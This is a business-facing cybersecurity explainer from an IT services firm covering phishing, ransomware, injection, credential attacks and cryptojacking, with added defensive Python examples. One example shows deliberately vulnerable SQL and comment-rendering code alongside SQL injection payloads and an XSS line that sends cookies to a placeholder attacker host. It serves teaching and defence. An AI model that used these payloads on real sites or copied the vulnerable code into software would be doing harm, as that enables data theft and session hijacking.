Table of Contents
- Social Engineering and Phishing
- Ransomware
- Malware and Endpoint Threats
- Man-in-the-Middle and Network Interception
- Denial of Service Attacks
- Web Application and Injection Attacks
- Domain and DNS Attacks
- Credential and Password Attacks
- Insider Threats
- Zero-Day and Unpatched Vulnerabilities
- Cryptojacking
- What This Means Practically
- Frequently Asked Questions
- 1. How do attackers find the personal details they use in spear phishing campaigns?
- 2. What does Business Email Compromise actually look like in practice — how does the money disappear so fast?
- 3. Is MFA actually effective against phishing, or are attackers already working around it?
- 4. How do attackers typically monetize access once they're inside a network?
- 5. What's the realistic risk from a vendor or supplier being compromised, and how does that affect your own network?
- 6. What's the difference between a vulnerability scan and a penetration test, and does a small business actually need both?
- 7. If an employee clicks a phishing link, what's the window to contain the damage?
- 8. How should a small business prioritize security spending when it can't afford to do everything at once?
According to the FBI's 2024 Internet Crime Report, cybercrime losses reported to the FBI in the US reached $16.6 billion in 2024 — a 33% increase over 2023 — across more than 859,000 complaints. The majority of incidents targeted businesses, and small and mid-sized organizations accounted for a disproportionate share of victims.
A firewall and antivirus are still worth having. They're just not enough — and haven't been for years. Modern attacks don't require bypassing your perimeter; they work through your inbox, your employees, your vendors, and your own credentials. Understanding how these attacks actually work is the first step toward defending against them.
Below are the major threat categories affecting businesses today, with enough detail to understand what you're actually up against.
Social Engineering and Phishing
Phishing remains the most reported cybercrime in the US — 193,407 complaints in 2024 alone. The term covers a broad family of attacks, but the core mechanic is the same: manipulate a person into taking an action they shouldn't. That might mean clicking a link, entering credentials on a fake login page, wiring money, or approving an MFA prompt they didn't initiate.
What's changed is the quality. Phishing emails used to be easy to spot — poor grammar, suspicious domains, obvious urgency. That's less true now. Attackers use AI tools to write convincing copy, clone real vendor invoices, and spoof internal email addresses with enough accuracy to fool people who should know better. Business Email Compromise (BEC) — a targeted form of phishing that impersonates executives or vendors to redirect payments — generated $2.77 billion in losses in 2024 according to the FBI.
Spear phishing is the targeted version: attackers research a specific person or organization before crafting the message. A message that references your actual CFO, your real accounting software vendor, and an invoice number from your legitimate billing cycle is very hard to dismiss on instinct alone. That's the point.
Defenses that actually help: email authentication that is actually enforced (SPF, DKIM, and DMARC with a p=quarantine or p=reject policy; a DMARC record with p=none only reports spoofing, it doesn't block it), phishing simulation training through platforms like KnowBe4, and MFA on all email accounts, phishing-resistant where the platform supports it — particularly Microsoft 365 and Google Workspace, which are the most impersonated platforms.
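The SPF and DMARC records a domain publishes are the part of that defense you can check yourself. The script below is an added example, not code from the article or from Stratify IT: it scores a set of constructed TXT records under placeholder domain names (the kind of text `dig TXT example.com` and `dig TXT _dmarc.example.com` return) and reports the settings that leave a domain spoofable, such as `~all`, `p=none`, a `pct` below 100, or more than ten lookup terms. It does no DNS queries itself; feed it real lookup results to assess your own domain.

```python
"""Assess the SPF and DMARC records a domain publishes.

Added example, not code from the original article. It does no DNS
lookups: SAMPLE_RECORDS holds constructed TXT records under placeholder
domain names, standing in for what `dig TXT <domain>` and
`dig TXT _dmarc.<domain>` would return.
"""
import re

# Constructed sample records (placeholder domains), not real lookups.
SAMPLE_RECORDS = {
    "weak.example": {
        "spf": "v=spf1 include:_spf.google.com ~all",
        "dmarc": "v=DMARC1; p=none; rua=mailto:dmarc@weak.example",
    },
    "strong.example": {
        "spf": "v=spf1 include:_spf.google.com -all",
        "dmarc": "v=DMARC1; p=reject; rua=mailto:dmarc@strong.example",
    },
    "nodmarc.example": {
        "spf": "v=spf1 +all",
        "dmarc": None,
    },
}

# SPF mechanisms and modifiers that each cost a DNS lookup (RFC 7208 caps them at 10).
LOOKUP_TERMS = {"include", "a", "mx", "ptr", "exists", "redirect"}


def assess_spf(spf):
    """Return (enforcing, findings) for one SPF TXT record (or None if absent)."""
    findings = []
    if spf is None or not spf.lower().startswith("v=spf1"):
        return False, ["no SPF record"]
    terms = spf.split()[1:]
    all_term = next((t for t in terms if re.fullmatch(r"[+\-~?]?all", t, re.I)), None)
    if all_term is None:
        findings.append("no 'all' mechanism: unlisted senders are treated as neutral")
    elif all_term.lstrip("+") == "all":
        findings.append("'+all' authorizes every host on the internet to send as you")
    elif all_term == "?all":
        findings.append("'?all' is neutral: spoofed mail is neither passed nor failed")
    elif all_term == "~all":
        findings.append("'~all' softfail: on its own this only marks spoofed mail; rely on DMARC p=reject to block it")
    lookups = sum(
        1 for t in terms
        if re.split(r"[:/=]", t.lstrip("+-~?"), maxsplit=1)[0].lower() in LOOKUP_TERMS
    )
    if lookups > 10:
        findings.append(f"{lookups} lookup terms exceed the limit of 10; receivers will return permerror")
    return not findings, findings


def assess_dmarc(dmarc):
    """Return (enforcing, findings) for the _dmarc TXT record (or None if absent)."""
    findings = []
    if dmarc is None:
        return False, ["no DMARC record at _dmarc.<domain>"]
    tags = {}
    for part in dmarc.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1":
        return False, ["malformed DMARC record (missing v=DMARC1)"]
    policy = tags.get("p", "").lower()
    if policy == "none":
        findings.append("p=none only monitors; spoofed mail is still delivered")
    elif policy not in ("quarantine", "reject"):
        findings.append(f"missing or unknown policy 'p={policy}'")
    pct = int(tags.get("pct", "100"))
    if pct < 100:
        findings.append(f"pct={pct}: the policy is applied to only {pct}% of failing mail")
    if "rua" not in tags:
        findings.append("no rua= address: you will never see aggregate reports of who is spoofing you")
    return not findings, findings


def assess_domain(domain, records=SAMPLE_RECORDS):
    """Combine both checks; 'enforcing' means both records actually block spoofing."""
    rec = records[domain]
    spf_ok, spf_findings = assess_spf(rec.get("spf"))
    dmarc_ok, dmarc_findings = assess_dmarc(rec.get("dmarc"))
    return {"domain": domain, "enforcing": spf_ok and dmarc_ok,
            "findings": spf_findings + dmarc_findings}


if __name__ == "__main__":
    for name in SAMPLE_RECORDS:
        result = assess_domain(name)
        print(name, "ENFORCING" if result["enforcing"] else "WEAK")
        for finding in result["findings"]:
            print("   *", finding)
```

Of the three constructed domains only strong.example comes back enforcing; weak.example has a valid-looking pair of records that still let spoofed mail through, which is the common state for organizations that set DMARC up once and never moved past p=none.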
Ransomware
Ransomware encrypts your files and demands payment for the decryption key. In practice, most attacks today go further: attackers exfiltrate data before encrypting it, so you're facing both operational shutdown and the threat of public data release — a model called double extortion.
The 2021 Colonial Pipeline attack is the most cited example of ransomware causing physical disruption. The ransomware hit the operator's IT systems, not the pipeline controls, but the company shut down 5,500 miles of fuel pipeline preemptively and paid a $4.4 million ransom within hours; the shutdown still lasted nearly a week and triggered fuel shortages across the southeastern US. The FBI later recovered roughly $2.3 million of the payment.
For most businesses, the scenario is less dramatic but still expensive. Ransomware typically enters through phishing emails, unpatched VPN vulnerabilities, or compromised remote desktop (RDP) credentials on systems exposed to the internet. Once inside, attackers move laterally — often sitting in the network for weeks before triggering encryption — to maximize damage, and they look for backup systems to destroy first.
Recovery without backups is either impossible or dependent on paying the ransom, which doesn't guarantee data restoration. According to Sophos's 2024 ransomware report, 70% of ransomware attacks in 2024 involved data encryption, and the average recovery cost reached $2.73 million — not counting ransom payments.
Defenses: immutable offsite backups tested regularly (at least one copy that no domain admin credential can delete or overwrite), network segmentation to limit lateral movement, endpoint detection and response (EDR) tools like CrowdStrike or SentinelOne, and a tested incident response plan. For organizations that haven't formalized their recovery procedures, disaster recovery planning covers the RTO, RPO, and failover decisions that determine how fast you can actually get back up.
Malware and Endpoint Threats
Malware is the umbrella term for malicious software — ransomware is a subset, but the category also includes spyware, trojans, keyloggers, and credential stealers. There are over 1.2 billion known malware programs in existence, and new variants are written constantly to evade signature-based detection.
Keyloggers record every keystroke on an infected device, capturing passwords, credit card numbers, and anything else typed — often without any visible symptoms. Spyware operates similarly but may also capture screenshots, browser history, and clipboard contents. These tools are commonly delivered through drive-by downloads (visiting a compromised website), infected email attachments, or pirated software.
Trojans masquerade as legitimate software. A user installs what looks like a PDF reader or utility tool; the trojan quietly establishes a backdoor or installs additional payloads. Once the backdoor exists, attackers can return at will.
Traditional antivirus relies on known threat signatures — it can't catch threats it hasn't seen before. EDR tools use behavioral analysis to detect anomalous activity (a process that shouldn't be accessing the registry, an application making outbound connections at 3am) regardless of whether the specific malware is in any database.
Man-in-the-Middle and Network Interception
Man-in-the-middle (MITM) attacks position an attacker between two communicating parties — typically a user and a web application — allowing them to intercept, read, or modify traffic in transit. Public Wi-Fi is the classic vector: an attacker on the same network can capture unencrypted traffic, downgrade a connection to plain HTTP before it is upgraded to HTTPS, or present a forged certificate, which the browser will warn about unless the user clicks through the warning.
For businesses, the more common risk is internal network interception — ARP poisoning, or LLMNR/NBT-NS poisoning that answers Windows name lookups with the attacker's address — by an attacker who has already gained network access and can position themselves to capture credentials, password hashes, or session tokens from other users on the same subnet.
Forcing HTTPS with strict transport security (HSTS), using certificate pinning in mobile and internal applications that you control (browsers no longer support pinning for websites), disabling LLMNR and NetBIOS name resolution on Windows endpoints, and routing remote employees through a VPN or Zero Trust Network Access (ZTNA) solution all reduce MITM exposure.
Denial of Service Attacks
A Denial of Service (DoS) attack floods a target — a web server, a network link, a specific application — with enough traffic or malformed requests to make it unresponsive. Distributed DoS (DDoS) scales this up by using a botnet: thousands or millions of compromised devices generating traffic simultaneously.
For most small businesses, a sustained DDoS means your website goes down, email stops working, or VoIP phones drop calls. For businesses dependent on uptime — e-commerce, financial services, healthcare portals — downtime has direct revenue and compliance implications.
Botnets — the networks of compromised devices used to run DDoS attacks — are also rented on dark web markets, meaning a competitor or disgruntled party can purchase an attack against your infrastructure for a few hundred dollars.
Web Application and Injection Attacks
SQL injection attacks exploit web forms or URLs whose input is spliced into the text of a database query instead of being passed as a bound parameter. An attacker enters a malicious string — something like ' OR '1'='1 — that changes the meaning of the query, potentially dumping the entire contents of a database, including usernames, hashed passwords, and customer records.
Cross-site scripting (XSS) attacks inject malicious JavaScript into a web page that executes in other users' browsers. A comment field on a forum, an unsanitized product review form, a support ticket system — any of these can be a delivery vehicle. The injected script might steal session cookies, redirect users to phishing pages, or capture form inputs.
Both attack types are common against any business running a web application — customer portals, booking systems, WordPress sites with third-party plugins. The root fix is in the code: parameterized queries for SQL and output encoding for anything rendered into HTML. Regular vulnerability scanning and a web application firewall (WAF) are the standard additional layers, but a WAF filters known payload patterns and should not be treated as a substitute for fixing the application.
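To make the mechanism concrete, here is an added example (not code from the article or from Stratify IT) that builds a constructed three-row user table in an in-memory SQLite database and runs the same lookup two ways: the vulnerable version splices the username into the query text, so the ' OR '1'='1 payload returns every user and a UNION payload returns the password hash column; the parameterized version returns nothing for either payload. The same block shows a comment field rendered with and without output encoding, which is the XSS counterpart of the same mistake. The hash strings are placeholders, not real hashes.

```python
"""SQL injection and stored XSS: the vulnerable code beside the fix.

Added example, not the article's own code. Uses an in-memory SQLite
table with constructed sample rows; the pw_hash values are placeholder
strings, not real password hashes.
"""
import html
import sqlite3


def make_db():
    """Constructed sample table standing in for a real user store."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, pw_hash TEXT, role TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "$2b$12$placeholder-hash-alice", "admin"),
        ("bob", "$2b$12$placeholder-hash-bob", "user"),
        ("carol", "$2b$12$placeholder-hash-carol", "user"),
    ])
    return db


def lookup_vulnerable(db, username):
    """Deliberately vulnerable: the input is spliced into the SQL text, so a
    quote in the input closes the string literal and the rest is parsed as SQL."""
    sql = "SELECT username, role FROM users WHERE username = '" + username + "'"
    return db.execute(sql).fetchall()


def lookup_safe(db, username):
    """Parameterized: the value travels separately from the statement and is
    never parsed as SQL, whatever characters it contains."""
    sql = "SELECT username, role FROM users WHERE username = ?"
    return db.execute(sql, (username,)).fetchall()


def render_comment_vulnerable(comment):
    """Deliberately vulnerable: user text is dropped straight into the page."""
    return '<p class="comment">' + comment + "</p>"


def render_comment_safe(comment):
    """Output encoding turns <, >, &, and quotes into entities, so the browser
    shows the payload as text instead of executing it."""
    return '<p class="comment">' + html.escape(comment, quote=True) + "</p>"


if __name__ == "__main__":
    db = make_db()
    bypass = "' OR '1'='1"
    dump = "' UNION SELECT username, pw_hash FROM users--"
    print("vulnerable, bypass :", lookup_vulnerable(db, bypass))  # every user
    print("vulnerable, dump   :", lookup_vulnerable(db, dump))    # hashes leak
    print("safe, bypass       :", lookup_safe(db, bypass))        # []
    print("safe, dump         :", lookup_safe(db, dump))          # []
    # Placeholder attacker host, constructed for the example.
    xss = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"
    print(render_comment_vulnerable(xss))
    print(render_comment_safe(xss))
```

The UNION payload is the one that matters for "dumping the database": once the attacker controls the tail of the query, they can append a second SELECT against any table the application's database account can read, which is also why that account should have the minimum grants the application needs.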
Domain and DNS Attacks
DNS spoofing (also called DNS cache poisoning) corrupts the DNS resolution process so that users trying to reach your legitimate domain are silently redirected to a fake site. The URL in the browser looks correct and the site looks correct, and the attacker is capturing every credential entered. HTTPS is the check that still works here: the fake site cannot present a valid certificate for your domain, so the browser warns, which is why these attacks pair with training users never to click through certificate errors.
Domain hijacking is more disruptive: attackers gain control of a domain registration (often through a compromised registrar account) and can redirect your entire web presence, intercept email, obtain valid certificates for the domain, or hold the domain hostage. MFA on the registrar account and registrar lock on the domain are the controls that matter here.
DNS filtering — such as Cisco Umbrella or similar tools — operates at the DNS layer to block known malicious domains before a connection is established, which stops a wide range of attacks that depend on phoning home to attacker infrastructure.
Credential and Password Attacks
Brute force attacks systematically try credential combinations — either pure guessing or, more commonly, credential stuffing: using username/password pairs leaked from previous breaches to try against other services. If an employee uses the same password for their personal accounts as for corporate systems, and that password was exposed in any of the thousands of known data breaches, attackers already have it.
Password spraying is a subtler variant: instead of hammering one account with many passwords (which triggers lockout policies), attackers try one common password against thousands of accounts. This often succeeds and doesn't trigger standard account lockout alerts.
MFA defeats most credential-based attacks — even with the correct username and password, an attacker can't authenticate without the second factor. Microsoft Entra ID (formerly Azure AD) with Conditional Access policies allows you to enforce MFA, restrict logins by geography or device compliance, and detect anomalous sign-in patterns.
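The reason spraying slips past lockout alerts is visible in the logs once you group by source instead of by account. The script below is an added example, not code from the article or from Stratify IT: it parses a constructed authentication log in a made-up one-line format (timestamp, source IP, user, result), slides a time window over each source IP's events, and raises a password-spray alert when one source fails against many accounts with only a few attempts each, as opposed to a brute-force alert when one account takes many failures. A success from a spraying source is reported separately, since that is the account to reset first. A real deployment would map Entra ID sign-in logs, Windows 4625/4624 events, or VPN logs into the same event shape.

```python
"""Tell password spraying from brute force in authentication logs.

Added example, not the article's own code. SAMPLE_LOG is a constructed
log in a made-up one-line format; the IPs are documentation addresses
and the usernames are placeholders.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>\S+)$")

# Constructed sample log. 203.0.113.7 tries one password against eleven
# accounts (a spray) and it works on 'kim'; 198.51.100.9 hammers 'bob'
# (brute force); 192.0.2.5 is a user who mistypes once and then signs in.
SAMPLE_LOG = (
    [f"2024-06-03T09:00:{5 * i:02d}Z src=203.0.113.7 user=u{i:02d} result=FAIL" for i in range(11)]
    + ["2024-06-03T09:01:00Z src=203.0.113.7 user=kim result=SUCCESS"]
    + [f"2024-06-03T09:0{i}:15Z src=198.51.100.9 user=bob result=FAIL" for i in range(7)]
    + ["2024-06-03T09:03:10Z src=192.0.2.5 user=alice result=FAIL",
       "2024-06-03T09:03:40Z src=192.0.2.5 user=alice result=SUCCESS"]
)


def parse(lines):
    """Turn log lines into events; lines that do not match the format are skipped."""
    events = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        events.append({
            "ts": datetime.fromisoformat(m["ts"].replace("Z", "+00:00")),
            "src": m["src"],
            "user": m["user"].lower(),
            "ok": m["result"] == "SUCCESS",
        })
    return events


def detect(events, window=timedelta(minutes=30), spray_accounts=8, brute_failures=5):
    """Slide a time window over each source IP's events.

    Spray: failures spread across many accounts, few per account, so no
    account reaches its lockout threshold. Brute force: many failures
    against one account. One alert per (source, type[, user]) is kept,
    updated as the window grows.
    """
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src"]].append(e)
    alerts = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            failures = defaultdict(int)
            successes = set()
            for e in evs[start:end + 1]:
                if e["ok"]:
                    successes.add(e["user"])
                else:
                    failures[e["user"]] += 1
            if len(failures) >= spray_accounts and max(failures.values()) < brute_failures:
                alerts[(src, "password_spray")] = {
                    "src": src, "type": "password_spray",
                    "accounts": len(failures), "successes": sorted(successes)}
            for user, n in failures.items():
                if n >= brute_failures:
                    alerts[(src, "brute_force", user)] = {
                        "src": src, "type": "brute_force", "user": user, "failures": n}
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect(parse(SAMPLE_LOG)):
        print(alert)
```

The per-source window is recomputed from scratch at every step, which is fine for a few thousand events and keeps the logic readable; a production detector would maintain running counts. The thresholds (8 accounts, 5 failures, 30 minutes) are starting points, not tuned values: set the brute-force threshold just below your lockout policy so the alert fires before the attacker backs off.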
Insider Threats
Insider threats come from employees, contractors, or vendors with legitimate access — either acting maliciously or, more often, accidentally. A disgruntled employee exfiltrating customer data before leaving. An IT contractor with admin credentials and no oversight. An employee who clicks a phishing link and doesn't report it because they're embarrassed. All of these are insider threat scenarios.
The challenge is that behavioral controls, not just technical controls, are required here. Role-based access control (RBAC) limits what any given account can reach. Privileged access management (PAM) tools log and control what admins do with elevated credentials. Data loss prevention (DLP) policies in Microsoft Purview or similar tools can flag unusual data transfers.
Zero-Day and Unpatched Vulnerabilities
A zero-day is a vulnerability for which no vendor fix exists yet — either because the vendor doesn't know about it, or because it knows but hasn't shipped a patch. Attackers who discover or purchase zero-days can exploit them with no patch available, leaving only compensating controls (reducing what is exposed to the internet, segmentation, EDR) until one ships. High-value zero-days sell for significant sums on criminal and broker markets and are typically reserved for targeted attacks against high-value targets.
More common for most businesses are known, unpatched vulnerabilities — software with available patches that simply haven't been applied. The 2021 Microsoft Exchange Server vulnerabilities (ProxyLogon, ProxyShell) were exploited for months after patches were available because organizations hadn't applied them. Patch management — systematic, timely patching of operating systems, applications, and network devices — is unglamorous but accounts for a substantial portion of actual attack surface.
Cryptojacking
Cryptojacking installs mining software on compromised devices to use their CPU/GPU power for cryptocurrency mining — without the owner's knowledge. The attacker pays nothing for compute; you pay the electricity and hardware wear. It typically goes undetected for a long time because there's no data theft or visible disruption, just degraded performance and unexplained resource consumption.
It's common in cloud environments, where attackers with access to credentials spin up compute resources and run mining workloads until the bill shows up. Monitoring cloud spend and setting alerts on unusual resource provisioning catches this. EDR tools can detect and kill the mining processes on endpoints.
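On an endpoint, a miner has two tells that survive renaming the binary: sustained CPU use and a stratum connection to a pool. The script below is an added example, not code from the article or from Stratify IT: it takes a constructed process and connection snapshot in the shape a collector would build from `ps -eo pid,comm,%cpu,args` and `ss -tnp`, and grades each process as confirmed (miner software or a stratum URL in the command line), likely (high CPU plus an outbound connection to a common pool port), or review (high CPU alone, which is what a video encode looks like too). The pool hostname, wallet string, and IPs are placeholders; the port list covers the ports mining pools commonly use and is a heuristic, not a complete list.

```python
"""Flag likely cryptominers from a process and connection snapshot.

Added example, not the article's own code. PROCESSES and CONNECTIONS are
constructed snapshots (placeholder hosts, wallet and IPs), not real data.
"""

# Command-line fragments that identify common miner software and the stratum
# mining protocol; a miner renamed to look like a kernel thread still has to
# carry its pool URL somewhere.
MINER_MARKERS = ("xmrig", "stratum+tcp://", "stratum+ssl://", "--donate-level", "minerd", "nicehash")
# Ports mining pools commonly listen on for stratum; a heuristic, not exhaustive.
STRATUM_PORTS = {3333, 4444, 5555, 14444}
HIGH_CPU = 80.0

# Constructed sample snapshot (not real data).
PROCESSES = [
    {"pid": 412, "comm": "kworkerds", "cpu": 97.5,
     "args": "/tmp/.x/kworkerds -o stratum+tcp://pool.example:4444 -u 4ABCplaceholderwallet -k"},
    {"pid": 1023, "comm": "ffmpeg", "cpu": 92.0, "args": "ffmpeg -i in.mp4 out.mkv"},
    {"pid": 2201, "comm": "python3", "cpu": 88.3, "args": "python3 worker.py"},
    {"pid": 77, "comm": "nginx", "cpu": 1.2, "args": "nginx: worker process"},
]
CONNECTIONS = [
    {"pid": 412, "remote": "198.51.100.20", "port": 4444},
    {"pid": 2201, "remote": "203.0.113.50", "port": 3333},
    {"pid": 77, "remote": "192.0.2.9", "port": 443},
]


def classify(proc, conns):
    """Return (level, reasons); level is 'confirmed', 'likely', 'review' or None."""
    reasons = []
    args = proc["args"].lower()
    markers = [m for m in MINER_MARKERS if m in args]
    if markers:
        reasons.append(f"miner marker in command line: {markers}")
    pool_conns = [c for c in conns if c["pid"] == proc["pid"] and c["port"] in STRATUM_PORTS]
    if pool_conns:
        endpoints = ", ".join(f"{c['remote']}:{c['port']}" for c in pool_conns)
        reasons.append("outbound to stratum port " + endpoints)
    hot = proc["cpu"] >= HIGH_CPU
    if hot:
        reasons.append(f"{proc['cpu']}% CPU")
    if markers:
        return "confirmed", reasons
    if pool_conns and hot:
        return "likely", reasons
    if hot:
        return "review", reasons
    return None, reasons


def scan(processes=PROCESSES, connections=CONNECTIONS):
    """Return {pid: (level, reasons)} for every process that warrants a look."""
    out = {}
    for proc in processes:
        level, reasons = classify(proc, connections)
        if level:
            out[proc["pid"]] = (level, reasons)
    return out


if __name__ == "__main__":
    for pid, (level, reasons) in scan().items():
        print(pid, level, "; ".join(reasons))
```

The 'review' tier exists to keep the ffmpeg case from paging anyone: CPU alone is not evidence, and a detector that fires on it trains the team to ignore it. The cloud-side equivalent is a billing or provisioning alert on unexpected compute, which catches the same behaviour before the invoice does.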
What This Means Practically
No single tool addresses all of these. A layered approach — MFA on all accounts, email filtering, DNS filtering, EDR on all endpoints, patching discipline, and regular backups — eliminates the majority of attack vectors in practice. The question isn't whether to do everything at once; it's which gaps are most likely to be exploited given your environment, industry, and threat profile.
A formal IT assessment gives you a baseline: what you have, what's missing, and what to prioritize. For businesses that have never had one, it's almost always more revealing than expected.
For more on specific attack defenses and tool recommendations, see our Protect Your Business from Cyberattacks guide.
Reach out to Stratify IT to discuss a cybersecurity assessment for your organization — we'll identify where you're exposed and what it actually takes to close those gaps.
Learn more about our cybersecurity services to see the full range of what we offer.
Stratify IT — cybersecurity built around your business, not a template.
Frequently Asked Questions
1. How do attackers find the personal details they use in spear phishing campaigns?
Most of it is already public. LinkedIn profiles show job titles, reporting structures, and recent projects. Company websites list executives by name. Data broker sites aggregate addresses, phone numbers, and employment history. After a breach, leaked databases often include email formats and internal org details. Attackers can build a convincing profile on a target employee in under an hour without touching anything illegal.
2. What does Business Email Compromise actually look like in practice — how does the money disappear so fast?
A typical BEC attack impersonates a CFO or vendor contact and requests a wire transfer to a new account, usually with a plausible reason like a banking change or urgent deal closing. The money moves to a domestic mule account, then gets fragmented and transferred internationally within hours. By the time someone flags it, recovery is nearly impossible. The FBI's Internet Crime Complaint Center (IC3) has a recovery process (the Financial Fraud Kill Chain), but it only works if you report within 72 hours.
3. Is MFA actually effective against phishing, or are attackers already working around it?
Standard MFA — SMS codes or authenticator apps — does get bypassed, primarily through adversary-in-the-middle proxies like Evilginx that sit between the user and the real site, capturing the session token in real time. That said, MFA still stops the vast majority of credential-based attacks. Phishing-resistant MFA using hardware keys (like YubiKeys) or passkeys is significantly harder to defeat and worth the investment for high-privilege accounts.
4. How do attackers typically monetize access once they're inside a network?
It depends on what they find. Ransomware is the most visible path — encrypt files, demand payment. But many attackers spend weeks in a network first, exfiltrating customer data, intellectual property, or financial records they can sell separately. Access to email accounts enables further BEC fraud targeting your clients. Some groups sell initial access to other criminal organizations rather than exploiting it themselves, which is why dwell time — the gap between breach and detection — matters so much.
5. What's the realistic risk from a vendor or supplier being compromised, and how does that affect your own network?
If a vendor has any kind of access to your systems — remote support tools, shared credentials, API integrations, or even just access to your email domain — their compromise becomes your exposure. The 2020 SolarWinds attack demonstrated this at scale, but it happens to small businesses constantly in less visible ways. A managed service provider getting hit with ransomware can cascade directly into client environments if network segmentation and access controls aren't in place.
6. What's the difference between a vulnerability scan and a penetration test, and does a small business actually need both?
A vulnerability scan is automated — it checks your systems against a database of known weaknesses and reports what it finds. A penetration test is a human exercise where a security professional actively tries to exploit those weaknesses and chain them together the way a real attacker would. Scans are useful and should run regularly. Pen tests reveal what actually matters in your specific environment. Most small businesses benefit more from consistent scanning plus a pen test every one to two years than from doing neither.
7. If an employee clicks a phishing link, what's the window to contain the damage?
Speed matters enormously. If you can isolate the affected device within the first 30 to 60 minutes, before the attacker establishes persistence or moves laterally, you have a real chance of containing the incident. That requires someone actively monitoring endpoint behavior — not just logging it. Attackers using automated tools can begin credential harvesting and lateral movement in minutes. Without endpoint detection and response (EDR) tooling and a documented incident response plan, most organizations don't even know something happened until days later.
8. How should a small business prioritize security spending when it can't afford to do everything at once?
Start with what attackers actually use, not what sounds impressive. Phishing-resistant MFA on email and remote access tools, endpoint detection and response software, and regular offsite backups that aren't connected to your main network address the most common attack paths. After that, look at privileged access — limit who has admin rights and why. Cybersecurity insurance is worth evaluating too, though carriers are increasingly scrutinizing controls before issuing policies, which effectively forces some baseline hygiene anyway.